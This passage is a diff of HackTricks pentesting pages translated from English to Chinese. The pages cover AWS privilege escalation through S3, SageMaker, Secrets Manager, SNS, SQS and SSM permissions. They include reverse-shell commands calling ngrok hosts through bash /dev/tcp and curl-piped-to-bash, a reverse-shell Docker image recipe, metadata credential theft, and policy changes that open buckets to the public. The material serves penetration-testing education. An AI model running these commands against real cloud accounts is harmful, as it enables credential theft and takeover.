+如[https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html)中所述,可以**从dynamodb获取数据**: ```sql copy favoritemovies from 'dynamodb://ProductCatalog' iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; ``` - > [!WARNING] -> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. +> 提供数据的 Amazon DynamoDB 表必须在与您的集群相同的 AWS 区域中创建,除非您使用 [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) 选项来指定 Amazon DynamoDB 表所在的 AWS 区域。 ### EMR -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) +查看 [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) ## References - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md index 0af161cbc..0907b383b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md @@ -6,117 +6,112 @@ ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject` -An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges. - -For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy: +拥有这些权限的攻击者可能能够劫持资源并提升权限。 +例如,拥有对名为 "cf-templates-nohnwfax6a6i-us-east-1" 的 **cloudformation bucket** 的这些权限的攻击者将能够劫持部署。可以通过以下策略授予访问权限: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "s3:PutBucketNotification", - "s3:GetBucketNotification", - "s3:PutObject", - "s3:GetObject" - ], - "Resource": [ - "arn:aws:s3:::cf-templates-*/*", - "arn:aws:s3:::cf-templates-*" - ] - }, - { - "Effect": "Allow", - "Action": "s3:ListAllMyBuckets", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": [ +"s3:PutBucketNotification", +"s3:GetBucketNotification", +"s3:PutObject", +"s3:GetObject" +], +"Resource": [ +"arn:aws:s3:::cf-templates-*/*", +"arn:aws:s3:::cf-templates-*" +] +}, +{ +"Effect": "Allow", +"Action": "s3:ListAllMyBuckets", +"Resource": "*" +} +] } ``` - -And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. +并且劫持是可能的,因为从**模板上传**到存储桶的那一刻到**模板部署**的那一刻之间有一个**小的时间窗口**。攻击者可能只需在他的账户中创建一个**lambda function**,当发送存储桶通知时将**触发**,并**劫持**该**存储桶**的**内容**。 ![](<../../../images/image (174).png>) -The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ -For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) +Pacu模块 [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) 可用于自动化此攻击。\ +有关更多信息,请查看原始研究:[https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) ### `s3:PutObject`, `s3:GetObject` -These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\ -An attacker with **read access** to them might find **sensitive information** on them.\ -An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ -These are some examples: +这些是**获取和上传对象到 S3**的权限。AWS内部(以及外部)的多个服务使用S3存储来存储**配置文件**。\ +具有**读取访问权限**的攻击者可能会在其中找到**敏感信息**。\ +具有**写入访问权限**的攻击者可以**修改数据以滥用某些服务并尝试提升权限**。\ +以下是一些示例: -- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. +- 如果EC2实例将**用户数据存储在S3存储桶中**,攻击者可以修改它以**在EC2实例内部执行任意代码**。 ### `s3:PutBucketPolicy` -An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets. - +攻击者需要**来自同一账户**,否则将触发错误`The specified method is not allowed`,具有此权限将能够授予自己对存储桶的更多权限,使他能够读取、写入、修改、删除和暴露存储桶。 ```bash # Update Bucket policy aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ## JSON giving permissions to a user and mantaining some previous root access { - "Id": "Policy1568185116930", - "Version":"2012-10-17", - "Statement":[ - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:root" - }, - "Action":"s3:ListBucket", - "Resource":"arn:aws:s3:::somebucketname" - }, - { - "Effect":"Allow", - "Principal":{ - "AWS":"arn:aws:iam::123123123123:user/username" - }, - "Action":"s3:*", - "Resource":"arn:aws:s3:::somebucketname/*" - } - ] +"Id": "Policy1568185116930", +"Version":"2012-10-17", +"Statement":[ +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:root" +}, +"Action":"s3:ListBucket", +"Resource":"arn:aws:s3:::somebucketname" +}, +{ +"Effect":"Allow", +"Principal":{ +"AWS":"arn:aws:iam::123123123123:user/username" +}, +"Action":"s3:*", +"Resource":"arn:aws:s3:::somebucketname/*" +} +] } ## JSON Public policy example ### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } ``` - ### `s3:GetBucketAcl`, `s3:PutBucketAcl` -An attacker could abuse these permissions to **grant him more access** over specific buckets.\ -Note that the attacker doesn't need to be from the same account. Moreover the write access - +攻击者可以利用这些权限来**授予自己更多的访问权限**,以便对特定的存储桶进行操作。\ +请注意,攻击者不需要来自同一账户。此外,写入访问权限 ```bash # Update bucket ACL aws s3api get-bucket-acl --bucket @@ -125,27 +120,25 @@ aws s3api put-bucket-acl --bucket --access-control-policy file://a ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectAcl` -An attacker could abuse these permissions to grant him more access over specific objects inside buckets. - +攻击者可以利用这些权限来授予他对存储桶内特定对象的更多访问权限。 ```bash # Update bucket object ACL aws s3api get-object-acl --bucket --key flag @@ -154,34 +147,27 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl` -An attacker with these privileges is expected to be able to put an Acl to an specific object version - +拥有这些权限的攻击者预计能够将 Acl 放置到特定对象版本上 ```bash aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index 890686262..bfc370027 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -6,68 +6,60 @@ ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` -Start creating a noteboook with the IAM Role to access attached to it: - +开始创建一个带有附加的 IAM 角色的笔记本: ```bash aws sagemaker create-notebook-instance --notebook-instance-name example \ - --instance-type ml.t2.medium \ - --role-arn arn:aws:iam:::role/service-role/ +--instance-type ml.t2.medium \ +--role-arn arn:aws:iam:::role/service-role/ ``` - -The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready: - +响应应包含一个 `NotebookInstanceArn` 字段,该字段将包含新创建的笔记本实例的 ARN。然后,我们可以使用 `create-presigned-notebook-instance-url` API 生成一个 URL,以便在笔记本实例准备好后访问它: ```bash aws sagemaker create-presigned-notebook-instance-url \ - --notebook-instance-name +--notebook-instance-name ``` +导航到浏览器中的 URL,点击右上角的 \`Open JupyterLab\`,然后向下滚动到“Launcher”选项卡,在“Other”部分,点击“Terminal”按钮。 -Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button. +现在可以访问 IAM 角色的元数据凭证。 -Now It's possible to access the metadata credentials of the IAM Role. - -**Potential Impact:** Privesc to the sagemaker service role specified. +**潜在影响:** 提升到指定的 sagemaker 服务角色。 ### `sagemaker:CreatePresignedNotebookInstanceUrl` -If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**. - +如果已经有 Jupyter **笔记本正在运行**,并且您可以通过 `sagemaker:ListNotebookInstances` 列出它们(或以其他方式发现它们)。您可以 **为它们生成一个 URL,访问它们,并窃取凭证,如前面技术所示**。 ```bash aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name ``` - -**Potential Impact:** Privesc to the sagemaker service role attached. +**潜在影响:** 提升到附加的 sagemaker 服务角色。 ### `sagemaker:CreateProcessingJob,iam:PassRole` -An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**. - +拥有这些权限的攻击者可以使 **sagemaker 执行一个 processingjob**,并附加一个 sagemaker 角色。攻击者可以指明将在 **AWS 管理的 ECS 账户实例** 中运行的容器的定义,并 **窃取附加的 IAM 角色的凭证**。 ```bash # I uploaded a python docker image to the ECR aws sagemaker create-processing-job \ - --processing-job-name privescjob \ - --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ - --app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ - --role-arn +--processing-job-name privescjob \ +--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ +--app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ +--role-arn # In my tests it took 10min to receive the shell curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds ``` - -**Potential Impact:** Privesc to the sagemaker service role specified. +**潜在影响:** 提升到指定的 sagemaker 服务角色。 ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. +拥有这些权限的攻击者将能够创建一个训练作业,**在其上运行任意容器**,并附加一个**角色**。因此,攻击者将能够窃取该角色的凭证。 > [!WARNING] -> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). +> 这个场景比前一个更难以利用,因为你需要生成一个 Docker 镜像,该镜像将直接将 rev shell 或凭证发送给攻击者(你无法在训练作业的配置中指定启动命令)。 > > ```bash -> # Create docker image +> # 创建 docker 镜像 > mkdir /tmp/rev -> ## Note that the trainning job is going to call an executable called "train" -> ## That's why I'm putting the rev shell in /bin/train -> ## Set the values of and +> ## 注意训练作业将调用一个名为 "train" 的可执行文件 +> ## 这就是我将 rev shell 放在 /bin/train 的原因 +> ## 设置 的值 > cat > /tmp/rev/Dockerfile < FROM ubuntu > RUN apt update && apt install -y ncat curl @@ -79,40 +71,34 @@ An attacker with those permissions will be able to create a training job, **runn > cd /tmp/rev > sudo docker build . -t reverseshell > -> # Upload it to ECR +> # 上传到 ECR > sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ > sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest > sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest > ``` - ```bash # Create trainning job with the docker image created aws sagemaker create-training-job \ - --training-job-name privescjob \ - --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ - --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ - --role-arn \ - --output-data-config '{"S3OutputPath": "s3://"}' \ - --stopping-condition '{"MaxRuntimeInSeconds": 600}' +--training-job-name privescjob \ +--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ +--algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ +--role-arn \ +--output-data-config '{"S3OutputPath": "s3://"}' \ +--stopping-condition '{"MaxRuntimeInSeconds": 600}' #To get the creds curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer ``` - -**Potential Impact:** Privesc to the sagemaker service role specified. +**潜在影响:** 提升到指定的 sagemaker 服务角色。 ### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole` -An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\ -&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._ +拥有这些权限的攻击者将(潜在地)能够创建一个 **超参数训练作业**,**在其上运行任意容器**,并附加一个 **角色**。\ +&#xNAN;_I 由于时间不足尚未进行利用,但看起来与之前的利用相似,欢迎发送 PR 以提供利用细节。_ -## References +## 参考 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md index bdc01433b..e8d6084c8 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md @@ -4,7 +4,7 @@ ## Secrets Manager -For more info about secrets manager check: +有关 Secrets Manager 的更多信息,请查看: {{#ref}} ../aws-services/aws-secrets-manager-enum.md @@ -12,44 +12,34 @@ For more info about secrets manager check: ### `secretsmanager:GetSecretValue` -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - +拥有此权限的攻击者可以获取 AWS **Secretsmanager** 中 **秘密内保存的值**。 ```bash aws secretsmanager get-secret-value --secret-id # Get value ``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. +**潜在影响:** 访问 AWS Secrets Manager 服务中的高度敏感数据。 ### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - +通过之前的权限,可以**授予其他主体/账户(甚至外部)**访问**秘密**的权限。请注意,为了**读取使用 KMS 密钥加密的秘密**,用户还需要对**KMS 密钥**具有**访问权限**(更多信息请参见 [KMS Enum page](../aws-services/aws-kms-enum.md))。 ```bash aws secretsmanager list-secrets aws secretsmanager get-resource-policy --secret-id aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json ``` - policy.json: - ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam:::root" - }, - "Action": "secretsmanager:GetSecretValue", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam:::root" +}, +"Action": "secretsmanager:GetSecretValue", +"Resource": "*" +} +] } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md index 699bb58cf..969f7200b 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md @@ -4,7 +4,7 @@ ## SNS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sns-enum.md @@ -12,36 +12,26 @@ For more information check: ### `sns:Publish` -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可以向SNS主题发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sns publish --topic-arn --message ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:漏洞利用,数据损坏,意外操作或资源耗尽。 ### `sns:Subscribe` -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - +攻击者可以订阅SNS主题,可能获得对消息的未经授权访问或干扰依赖该主题的应用程序的正常功能。 ```bash aws sns subscribe --topic-arn --protocol --endpoint ``` - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. +**潜在影响**:未经授权访问消息(敏感信息),依赖受影响主题的应用程序服务中断。 ### `sns:AddPermission` -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - +攻击者可以授予未经授权的用户或服务访问SNS主题的权限,从而可能获得进一步的权限。 ```css aws sns add-permission --topic-arn --label --aws-account-id --action-name ``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. +**潜在影响**:未经授权访问主题、消息暴露或未经授权用户或服务对主题的操控,干扰依赖于该主题的应用程序的正常功能。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md index 384ed8430..3439c0865 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md @@ -4,7 +4,7 @@ ## SQS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md @@ -12,39 +12,29 @@ For more information check: ### `sqs:AddPermission` -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - +攻击者可以利用此权限通过创建新策略或修改现有策略来授予未经授权的用户或服务访问SQS队列的权限。这可能导致未经授权的访问队列中的消息或未经授权的实体对队列的操控。 ```bash cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label ``` - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. +**潜在影响**:未经授权访问队列、消息暴露或未经授权用户或服务对队列的操控。 ### `sqs:SendMessage` , `sqs:SendMessageBatch` -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可以向 SQS 队列发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sqs send-message --queue-url --message-body aws sqs send-message-batch --queue-url --entries ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:漏洞利用、数据损坏、意外操作或资源耗尽。 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - +攻击者可以接收、删除或修改SQS队列中消息的可见性,从而导致消息丢失、数据损坏或依赖这些消息的应用程序服务中断。 ```bash aws sqs receive-message --queue-url aws sqs delete-message --queue-url --receipt-handle aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout ``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. +**潜在影响**:窃取敏感信息、消息丢失、数据损坏,以及依赖受影响消息的应用程序服务中断。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md index c4067e2ca..84af36044 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md @@ -4,7 +4,7 @@ ## SSM -For more info about SSM check: +有关SSM的更多信息,请查看: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ @@ -12,8 +12,7 @@ For more info about SSM check: ### `ssm:SendCommand` -An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. - +具有权限 **`ssm:SendCommand`** 的攻击者可以 **在运行Amazon SSM Agent的实例中执行命令** 并 **危害其中运行的IAM角色**。 ```bash # Check for configured instances aws ssm describe-instance-information @@ -21,26 +20,22 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" ``` - -In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with: - +在您使用此技术在已被攻陷的 EC2 实例中提升权限的情况下,您可以通过以下方式在本地捕获 rev shell: ```bash # If you are in the machine you can capture the reverseshel inside of it nc -lvnp 4444 #Inside the EC2 instance aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**潜在影响:** 直接提升权限到附加在运行实例上的 EC2 IAM 角色,这些实例运行着 SSM Agents。 ### `ssm:StartSession` -An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. - +拥有权限 **`ssm:StartSession`** 的攻击者可以 **在运行 Amazon SSM Agent 的实例中启动类似 SSH 的会话**,并 **危害其中运行的 IAM 角色**。 ```bash # Check for configured instances aws ssm describe-instance-information @@ -49,68 +44,58 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm start-session --target "$INSTANCE_ID" ``` - > [!CAUTION] -> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) +> 要开始会话,您需要安装 **SessionManagerPlugin**: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色,这些实例运行着 SSM Agents。 -#### Privesc to ECS - -When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\ -According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. (SSM Session Manager Plugin necesary for this to work)\ -Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running: +#### 提升权限到 ECS +当 **ECS 任务** 以 **`ExecuteCommand` 启用** 运行时,具有足够权限的用户可以使用 `ecs execute-command` 在容器内 **执行命令**。\ +根据 [**文档**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/),这是通过在您用来启动“_exec_”命令的设备与目标容器之间创建安全通道来完成的,使用 SSM Session Manager。(SSM Session Manager Plugin 是此功能正常工作的必要条件)\ +因此,具有 `ssm:StartSession` 权限的用户将能够通过运行以下命令 **在启用该选项的 ECS 任务中获取 shell**: ```bash aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` - ![](<../../../images/image (185).png>) -**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. +**潜在影响:** 直接提升权限到附加到运行任务的 `ECS` IAM 角色,且该任务启用了 `ExecuteCommand`。 ### `ssm:ResumeSession` -An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it. - +拥有权限 **`ssm:ResumeSession`** 的攻击者可以在运行 Amazon SSM Agent 的实例中重新**启动 SSH 类会话**,该会话处于**断开**的 SSM 会话状态,并**危害其中运行的 IAM 角色**。 ```bash # Check for configured instances aws ssm describe-sessions # Get resume data (you will probably need to do something else with this info to connect) aws ssm resume-session \ - --session-id Mary-Major-07a16060613c408b5 +--session-id Mary-Major-07a16060613c408b5 ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色,这些实例运行着 SSM 代理并且有断开的会话。 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) -An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys. - +拥有上述权限的攻击者将能够列出 **SSM 参数** 并 **以明文读取它们**。在这些参数中,您经常可以 **找到敏感信息**,例如 SSH 密钥或 API 密钥。 ```bash aws ssm describe-parameters # Suppose that you found a 